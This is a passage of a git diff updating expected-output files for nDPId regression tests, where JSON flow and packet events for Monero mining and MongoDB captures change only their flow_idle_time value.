+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":199,"source":"monero.pcap","alias":"nDPId-test","packets-captured":199,"packets-processed":198,"total-skipped-flows":0,"total-l4-data-len":82647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1514196819733} -00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","packets-captured":319,"packets-processed":319,"total-skipped-flows":0,"total-l4-data-len":146090,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1514197279769} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 319/319 diff --git a/test/results/mongodb.pcap.out b/test/results/mongodb.pcap.out index a1682af59..a1a449ec9 100644 --- a/test/results/mongodb.pcap.out +++ b/test/results/mongodb.pcap.out @@ -1,39 +1,39 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mongodb.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1483459978959} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483459978959,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483459978959,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483459978959,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483459978959,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1483558834969} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1483726705497} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="} 